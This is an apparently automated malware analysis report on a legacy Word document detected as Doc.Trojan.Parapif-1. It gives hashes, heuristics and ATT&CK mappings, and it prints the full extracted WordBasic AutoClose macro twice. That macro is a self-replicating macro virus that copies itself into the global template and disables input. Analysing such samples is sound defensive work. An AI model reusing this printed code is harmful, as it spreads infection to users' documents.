Office (OLE) malware analysis — malicious · a24f50d6f16d2852

MALICIOUS

Office (OLE)

30.5 KB Created: 2001-12-08 05:35:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 7e60b7c59e4627386e1eac95627c0847 SHA-1: 0535446a0e2addac45b98e3e9e2f6373a18fc109 SHA-256: a24f50d6f16d285245c429013b38a6ff51aa84dcae7280f81d0ff4e4032e7c6f

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a WordBasic AutoClose macro, identified by heuristics and the ClamAV signature Doc.Trojan.Parapif-1. The AutoClose macro is designed to execute automatically when the document is closed, indicating an attempt to run malicious code. This macro likely serves as an initial execution vector for a secondary payload, consistent with spearphishing attachment tactics.

Heuristics 4

ClamAV: Doc.Trojan.Parapif-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Parapif-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3101 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3101 bytes
SHA-256: `30f7be020460143e91a13e04c48b6c789638f65626174bff447b9118108380c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AutoClose" Public Sub MAIN() Dim IQ Dim aa Dim s Dim a$ Dim am$ Dim IQ1 Dim aaa Dim ss Dim R Dim A_ On Error Resume Next WordBasic.DisableInput 1 IQ = WordBasic.CountMacros(0) If IQ > 0 Then For aa = 1 To IQ If WordBasic.[MacroName$](aa, 0) = "AutoClose" Then s = 1 End If Next aa End If a$ = WordBasic.[FileName$]() am$ = a$ + ":AutoClose" If s <> 1 Then WordBasic.MacroCopy am$, "AutoClose", -1 End If IQ1 = WordBasic.CountMacros(1) If IQ1 > 0 Then For aaa = 1 To IQ1 If WordBasic.[MacroName$](aaa, 1) = "AutoClose" Then ss = 1 End If Next aaa End If If ss <> 1 Then WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "AutoClose", am$, -1 End If R = 1 WordBasic.BeginDialog 396, 266, "? ? ? ? ? ? ? ?" WordBasic.PushButton 7, 139, 88, 21, "????", "Push1" WordBasic.PushButton 8, 167, 88, 21, "????", "Push2" WordBasic.PushButton 8, 197, 88, 21, "????", "Push3" WordBasic.PushButton 8, 228, 88, 21, "????", "Push4" WordBasic.Text 15, 7, 330, 13, "???????????????????!!", "Text1" WordBasic.Text 15, 26, 328, 13, "???????????,??????,???", "Text2" WordBasic.Text 15, 45, 334, 13, "?,???????????!!????????", "Text4" WordBasic.Text 15, 64, 194, 13, "????,?????!!!!!!", "Text5" WordBasic.Text 15, 83, 336, 13, "??????????,??????????", "Text7" WordBasic.Text 15, 102, 330, 13, "??????????!!??????????", "Text8" WordBasic.Text 15, 121, 312, 13, "???????..................................................", "Text9" WordBasic.Text 110, 143, 256, 13, "????????????????", "Text10" WordBasic.Text 111, 172, 256, 13, "????????????????", "Text11" WordBasic.Text 110, 201, 256, 13, "????????????????", "Text12" WordBasic.Text 109, 232, 224, 13, "??????????????", "Text13" WordBasic.EndDialog QQQ: WordBasic.Beep Dim pig As Object: Set pig = WordBasic.CurValues.UserDialog A_ = WordBasic.Dialog.UserDialog(pig) If A_ = 1 Then WordBasic.Beep WordBasic.MsgBox "??Trend??????????pc-cillin97???????????!???????????,????!", "????????,????,??????", 16 End If If A_ = 2 Then WordBasic.Beep WordBasic.MsgBox "?????????????????????GGreat???????,??????????????????????!", "????????,????,??????", 16 End If If A_ = 3 Then WordBasic.Beep WordBasic.MsgBox "???????????,?????????,???????????,?????????????! ? ! ???!!???!!", "????????,????,??????", 16 End If If A_ = 4 Then WordBasic.Beep WordBasic.MsgBox "????????????????,??????,????????????,???????????golf??!!", "????????,????,??????", 16 End If R = R + 1 If R <= 4 Then GoTo QQQ WordBasic.FileNewDefault WordBasic.CenterPara WordBasic.FormatFont Points:=40, Underline:=1, Color:=2, Bold:=1 WordBasic.Insert "????????,???????,????????,sorry!!???shift?,??? ?? / ???? ??!!" exit_: End Sub

SHA-256: 30f7be020460143e91a13e04c48b6c789638f65626174bff447b9118108380c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
Dim IQ
Dim aa
Dim s
Dim a$
Dim am$
Dim IQ1
Dim aaa
Dim ss
Dim R
Dim A_
On Error Resume Next
WordBasic.DisableInput 1

IQ = WordBasic.CountMacros(0)
If IQ > 0 Then
For aa = 1 To IQ
If WordBasic.[MacroName$](aa, 0) = "AutoClose" Then
s = 1
End If
Next aa
End If

a$ = WordBasic.[FileName$]()
am$ = a$ + ":AutoClose"
If s <> 1 Then
WordBasic.MacroCopy am$, "AutoClose", -1
End If

IQ1 = WordBasic.CountMacros(1)
If IQ1 > 0 Then
For aaa = 1 To IQ1
If WordBasic.[MacroName$](aaa, 1) = "AutoClose" Then
ss = 1
End If
Next aaa
End If

If ss <> 1 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "AutoClose", am$, -1
End If

R = 1
WordBasic.BeginDialog 396, 266, "? ? ? ? ? ? ? ?"
    WordBasic.PushButton 7, 139, 88, 21, "????", "Push1"
    WordBasic.PushButton 8, 167, 88, 21, "????", "Push2"
    WordBasic.PushButton 8, 197, 88, 21, "????", "Push3"
    WordBasic.PushButton 8, 228, 88, 21, "????", "Push4"
    WordBasic.Text 15, 7, 330, 13, "???????????????????!!", "Text1"
    WordBasic.Text 15, 26, 328, 13, "???????????,??????,???", "Text2"
    WordBasic.Text 15, 45, 334, 13, "?,???????????!!????????", "Text4"
    WordBasic.Text 15, 64, 194, 13, "????,?????!!!!!!", "Text5"
    WordBasic.Text 15, 83, 336, 13, "??????????,??????????", "Text7"
    WordBasic.Text 15, 102, 330, 13, "??????????!!??????????", "Text8"
    WordBasic.Text 15, 121, 312, 13, "???????..................................................", "Text9"
    WordBasic.Text 110, 143, 256, 13, "????????????????", "Text10"
    WordBasic.Text 111, 172, 256, 13, "????????????????", "Text11"
    WordBasic.Text 110, 201, 256, 13, "????????????????", "Text12"
    WordBasic.Text 109, 232, 224, 13, "??????????????", "Text13"
WordBasic.EndDialog

QQQ:
WordBasic.Beep
Dim pig As Object: Set pig = WordBasic.CurValues.UserDialog
A_ = WordBasic.Dialog.UserDialog(pig)
If A_ = 1 Then
WordBasic.Beep
WordBasic.MsgBox "??Trend??????????pc-cillin97???????????!???????????,????!", "????????,????,??????", 16
End If
If A_ = 2 Then
WordBasic.Beep
WordBasic.MsgBox "?????????????????????GGreat???????,??????????????????????!", "????????,????,??????", 16

End If
If A_ = 3 Then
WordBasic.Beep
WordBasic.MsgBox "???????????,?????????,???????????,?????????????! ? ! ???!!???!!", "????????,????,??????", 16
End If
If A_ = 4 Then
WordBasic.Beep
WordBasic.MsgBox "????????????????,??????,????????????,???????????golf??!!", "????????,????,??????", 16
End If
R = R + 1
If R <= 4 Then GoTo QQQ

WordBasic.FileNewDefault
WordBasic.CenterPara
WordBasic.FormatFont Points:=40, Underline:=1, Color:=2, Bold:=1
WordBasic.Insert "????????,???????,????????,sorry!!???shift?,??? ?? / ???? ??!!"
exit_:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.